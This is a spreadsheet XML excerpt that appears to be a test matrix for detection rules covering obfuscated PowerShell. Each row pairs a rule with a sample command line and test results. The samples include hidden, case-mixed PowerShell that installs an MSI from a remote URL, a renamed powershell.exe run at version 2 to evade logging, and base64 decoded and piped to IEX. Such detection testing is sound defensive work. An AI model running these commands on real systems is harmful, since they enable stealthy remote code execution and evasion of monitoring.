      </c>
      <c r="K1410" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1411" ht="15.75" customHeight="1" s="42">
      <c r="A1411" s="43" t="n"/>
      <c r="B1411" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1411" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1411" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1411" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -wInDowsTyLe Hidden -COmMANd "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F1411" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1411" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1411" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1411" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J1411" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1411" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1412" ht="15.75" customHeight="1" s="42">
      <c r="A1412" s="43" t="n"/>
      <c r="B1412" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1412" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1412" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1412" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -WInDowSTYLE Hidden -cOmmaND "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F1412" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1412" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1412" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1412" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J1412" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1412" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1413" ht="15.75" customHeight="1" s="42">
      <c r="A1413" s="43" t="n"/>
      <c r="B1413" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1413" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1413" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1413" s="36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413" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1413" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1413" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1413" s="43" t="n"/>
      <c r="J1413" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1413" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1414" ht="15.75" customHeight="1" s="42">
      <c r="A1414" s="43" t="n"/>
      <c r="B1414" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1414" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1414" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1414" s="36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414" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1414" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1414" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1414" s="43" t="n"/>
      <c r="J1414" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1414" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1415" ht="15.75" customHeight="1" s="42">
      <c r="A1415" s="43" t="n"/>
      <c r="B1415" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1415" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1415" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1415" s="36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1415" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1415" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1415" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1415" s="43" t="n"/>
      <c r="J1415" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1415" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1416" ht="15.75" customHeight="1" s="42">
      <c r="A1416" s="43" t="n"/>
      <c r="B1416" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C1416" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D1416" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E1416" s="36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1416" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1416" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1416" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1416" s="36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416" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1416" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1417" ht="15.75" customHeight="1" s="42">
      <c r="A1417" s="43" t="n"/>
      <c r="B1417" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C1417" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D1417" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E1417" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden -C "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F1417" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1417" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1417" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1417" s="43" t="n"/>
      <c r="J1417" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1417" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1418" ht="15.75" customHeight="1" s="42">
      <c r="A1418" s="43" t="n"/>
      <c r="B1418" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C1418" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D1418" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E1418" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -w Hidden -C "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F1418" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1418" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1418" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1418" s="43" t="n"/>
      <c r="J1418" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1418" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1419" ht="15.75" customHeight="1" s="42">
      <c r="A1419" s="43" t="n"/>
      <c r="B1419" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C1419" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D1419" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E1419" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden -c "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F1419" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1419" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1419" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1419" s="43" t="n"/>
      <c r="J1419" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1419" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1420" ht="15.75" customHeight="1" s="42">
      <c r="A1420" s="43" t="n"/>
      <c r="B1420" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C1420" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D1420" s="36" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E1420" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\updater.exe &amp;&amp; C:\Temp\updater.exe -version 2</t>
        </is>
      </c>
      <c r="F1420" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1420" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1420" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1420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1420" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1420" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1421" ht="15.75" customHeight="1" s="42">
      <c r="A1421" s="43" t="n"/>
      <c r="B1421" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C1421" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D1421" s="36" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E1421" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\updater.exe &amp;&amp; C:\Temp\updater.exe -vErSIoN 2</t>
        </is>
      </c>
      <c r="F1421" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1421" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1421" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1421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1421" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1421" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1422" ht="15.75" customHeight="1" s="42">
      <c r="A1422" s="43" t="n"/>
      <c r="B1422" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C1422" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D1422" s="36" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E1422" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\updater.exe &amp;&amp; C:\Temp\updater.exe -VeRsIOn 2</t>
        </is>
      </c>
      <c r="F1422" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1422" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1422" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1422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1422" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1422" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1423" ht="15.75" customHeight="1" s="42">
      <c r="A1423" s="43" t="n"/>
      <c r="B1423" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C1423" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D1423" s="36" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E1423" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\updater.exe &amp;&amp; C:\Temp\updater.exe -vErSioN 2</t>
        </is>
      </c>
      <c r="F1423" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1423" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1423" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1423" s="43" t="inlineStr">
        <is>
          <t>Potential Defense Evasion Via Rename Of Highly Relevant Binaries (0ba1da6d-b6ce-4366-828c-18826c9de23e); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1423" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1423" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1424" ht="15.75" customHeight="1" s="42">
      <c r="A1424" s="43" t="n"/>
      <c r="B1424" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C1424" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D1424" s="36" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E1424" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -v 2-Command "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F1424" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1424" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1424" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1424" s="43" t="n"/>
      <c r="J1424" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1424" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1425" ht="15.75" customHeight="1" s="42">
      <c r="A1425" s="43" t="n"/>
      <c r="B1425" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C1425" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D1425" s="36" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E1425" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Version 2-Command "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F1425" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1425" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1425" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1425" s="36" t="n"/>
      <c r="J1425" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1425" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1426" ht="15.75" customHeight="1" s="42">
      <c r="A1426" s="43" t="n"/>
      <c r="B1426" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C1426" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D1426" s="36" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E1426" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -V 2-Command "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F1426" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1426" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1426" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1426" s="43" t="n"/>
      <c r="J1426" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1426" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1427" ht="15.75" customHeight="1" s="42">
      <c r="A1427" s="43" t="n"/>
      <c r="B1427" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C1427" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D1427" s="36" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E1427" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Version 2.0 -Command "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F1427" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1427" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1427" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1427" s="43" t="n"/>
      <c r="J1427" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1427" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1428" ht="15.75" customHeight="1" s="42">
      <c r="A1428" s="43" t="n"/>
      <c r="B1428" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C1428" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D1428" s="36" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E1428" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -VerSIoN 2.0 -c "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F1428" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1428" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1428" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1428" s="43" t="n"/>
      <c r="J1428" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1428" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1429" ht="15.75" customHeight="1" s="42">
      <c r="A1429" s="43" t="n"/>
      <c r="B1429" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C1429" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D1429" s="36" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E1429" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -v 2.0 -cOmmAnd "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F1429" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1429" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1429" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1429" s="43" t="n"/>
      <c r="J1429" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1429" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1430" ht="15.75" customHeight="1" s="42">
      <c r="A1430" s="43" t="n"/>
      <c r="B1430" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C1430" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D1430" s="36" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E1430" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -VERsION 2.0 -c "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F1430" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1430" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1430" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1430" s="43" t="n"/>
      <c r="J1430" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1430" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1431" ht="15.75" customHeight="1" s="42">
      <c r="A1431" s="43" t="n"/>
      <c r="B1431" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C1431" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D1431" s="36" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E1431" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -v 2.0 -c "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F1431" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1431" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1431" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1431" s="43" t="n"/>
      <c r="J1431" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1431" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1432" ht="15.75" customHeight="1" s="42">
      <c r="A1432" s="43" t="n"/>
      <c r="B1432" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C1432" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D1432" s="36" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E1432" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -v 2.0 -ComMAnd "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F1432" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1432" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1432" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1432" s="36" t="n"/>
      <c r="J1432" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1432" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1433" ht="15.75" customHeight="1" s="42">
      <c r="A1433" s="43" t="n"/>
      <c r="B1433" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C1433" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D1433" s="36" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E1433" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -VErsION 2.0 -COmManD "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F1433" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1433" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1433" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1433" s="43" t="n"/>
      <c r="J1433" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1433" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1434" ht="15.75" customHeight="1" s="42">
      <c r="A1434" s="43" t="n"/>
      <c r="B1434" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C1434" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D1434" s="36" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E1434" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -VerSiOn 2.0 -coMmAND "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F1434" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1434" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1434" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1434" s="36" t="n"/>
      <c r="J1434" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1434" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1435" ht="15.75" customHeight="1" s="42">
      <c r="A1435" s="43" t="n"/>
      <c r="B1435" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C1435" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D1435" s="36" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E1435" s="36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F1435" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1435" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1435" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1435" s="36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435" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1435" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1436" ht="15.75" customHeight="1" s="42">
      <c r="A1436" s="43" t="n"/>
      <c r="B1436" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C1436" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D1436" s="36" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E1436" s="36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F1436" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1436" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1436" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1436" s="36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436" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1436" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1437" ht="15.75" customHeight="1" s="42">
      <c r="A1437" s="43" t="n"/>
      <c r="B1437" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C1437" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D1437" s="36" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E1437" s="36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F1437" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1437" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1437" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1437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437" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1437" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1438" ht="15.75" customHeight="1" s="42">
      <c r="A1438" s="43" t="n"/>
      <c r="B1438" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C1438" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D1438" s="36" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E1438" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F1438" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1438" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1438" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1438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38" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1438" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1439" ht="15.75" customHeight="1" s="42">
      <c r="A1439" s="43" t="n"/>
      <c r="B1439" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C1439" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D1439" s="36" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E1439" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMANd "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F1439" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1439" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1439" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1439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39" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1439" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1440" ht="15.75" customHeight="1" s="42">
      <c r="A1440" s="43" t="n"/>
